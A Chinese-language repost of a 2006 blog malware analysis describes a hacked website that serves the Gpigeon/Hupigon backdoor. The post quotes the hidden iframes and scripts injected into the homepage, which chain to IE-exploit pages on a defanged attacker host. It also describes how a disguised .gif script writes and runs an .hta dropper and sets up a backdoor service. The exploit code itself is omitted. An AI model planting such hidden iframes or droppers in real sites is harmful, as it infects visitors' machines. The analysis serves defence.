Your Ad Here
首页 | 编程语言 | 网站建设 | 游戏天堂 | 冲浪宝典 | 网络安全 | 操作系统 | 软件时空 | 硬件指南 | 病毒相关 | IT 认证
软讯网络 > 软件时空 > 软件相关 > 一个下载灰鸽子Backdoor.Gpigeon.2006等病毒的网站
【标  题】:一个下载灰鸽子Backdoor.Gpigeon.2006等病毒的网站
【关键字】:Backdoor.Gpigeon.2006
【来  源】:http://blog.csdn.net/Purpleendurer/archive/2006/07/27/984582.aspx

一个下载灰鸽子Backdoor.Gpigeon.2006等病毒的网站

Your Ad Here

endurer 原创
2006-07-27 第1

该网站首页被加入代码:
--------------
<iframe src=hxxp://duolaa***meng.diy.myrice.com/bushan.htm width=0 height=0 frameborder=0></iframe>
--------------

hxxp://duolaa***meng.diy.myrice.com/bushan.htm 的代码为:
--------------
<iframe src=hxxp://duolaa***meng.diy.myrice.com/girl.html width=0 height=0 frameborder=0></iframe>
<iframe src=hxxp://duolaa***meng.diy.myrice.com/xxxxx.htm width=0 height=0 frameborder=0></iframe>
<iframe src=hxxp://duolaa***meng.diy.myrice.com/ray.htm width=0 height=0 frameborder=0></iframe>
<script src="hxxp://www.xcinfo.ha.cn/jsq/default.asp?User=duolaameng&Length=6&x=15&y=20&Mode=002"></script>
<script language=javascript>
<!--
var m_tc_server="vip7.t2t2.com";
var m_tc_website="51933";
var m_tc_parent_website="0";
var m_tc_style="1";
//-->
</script>
<script language=javascript src="hxxp://vip7.t2t2.com/visit.js"></script>
--------------

hxxp://duolaa***meng.diy.myrice.com/girl.html 代码略。Kaspersky报为:Trojan-Downloader.JS.Small.cr,瑞星报为:Hack.Exploit.JS.IeWmv.a


hxxp://duolaa***meng.diy.myrice.com/xxxxx.htm  代码略。Kaspersky报为 Exploit.HTML.Mht,瑞星报为 Script.Trojan.b。利用IE漏洞下载文件 hxxp://duolaa***meng.diy.myrice.com/xxxxx.chm。

xxxxx.chm 包含2个文件:
1、xxxxx.exe 是灰鸽子文件。Kaspersky 报为 Backdoor.Win32.Hupigon.aho
会把自已复制为 %windir%\Wintimes.exe,创建名为"Wintimes"的系统服务用于启动
HijackThis 1.99.1的log显示为:
---------
O23 - Service: Wintimes - Unknown owner - C:\WINDOWS\Wintimes.exe (file missing)
---------
释放 %windir%\Wintimes.DLL Kaspersky 报为 Backdoor.Win32.Hupigon.buo,瑞星报为 Backdoor.Gpigeon.2006.po

2、xxxxx.htm Kaspersky报为 Exploit.HTML.CodeBaseExec,瑞星报为 Hack.Exploit.HTML.CodeExec


hxxp://duolaa***meng.diy.myrice.com/ray.htm  代码略。利用IE漏洞,下载下列文件:

1、hxxp://duolaa***meng.diy.myrice.com/Setup.exe Kaspersky 报为 Backdoor.Win32.Hupigon.buo

2、hxxp://duolaa***meng.diy.myrice.com/ray.exe
未能获取

3、hxxp://duolaa***meng.diy.myrice.com/ray.gif

ray.gif  其实是个脚本程序文件,其功能为:利用ADODB创建并运行文件 NTDETECT.hta。
NTDETECT.hta 在IE临时文件夹里搜索 ray[1].exe 和 ray[2].exe,把它复制为 C:\only23.exe 并运行;创建并运行文件 c:\cmd.bat。
c:\cmd.bat 负责删除 NTDETECT.hta 和 c:\cmd.bat

ray.gif的代码略。可参考:

利用ADODB写文件——恶意文件young.gif代码的分析心得1
http://blog.csdn.net/purpleendurer/archive/2006/04/08/655267.aspx


hxxp://vip7.t2t2.com/visit.js 是[太极统计]的代码

hxxp://www.xcinfo.ha.cn/jsq/default.asp?User=duolaameng&Length=6&x=15&y=20&Mode=002 是天堂免费计数器代码 

Windows Server 2003 设置大全(一):【上一篇】
少年的我们毕竟还没到自觉的年龄:【下一篇】
【相关文章】
没有相关文章
【随机文章】
  • Debian 系统配置文件
  • sarg抓的图片
  • 内核_如何加载自己写的模块[ZT]
  • 建立Excel超级链接
  • Java经典问题
  • JSP由浅入深(8)—— JSP Tags
  • 怎样开好项目开工会
  • 图像处理中的几个简单函数
  • Cross-Platform.GUI.Programming.with.wxWidgets简体中文翻译版发布
  • 小试牛刀之Winzip8.0破解
    • 【相关评论】
    没有相关评论
    【发表评论】
    姓名:
    邮件:
    随机码*
    评论*
          
    |  首 页  |  版权声明  |  联系我们   |  网站地图  |
    CopyRight © 2004-2007 bbb软讯网络 All Rigths Reserved.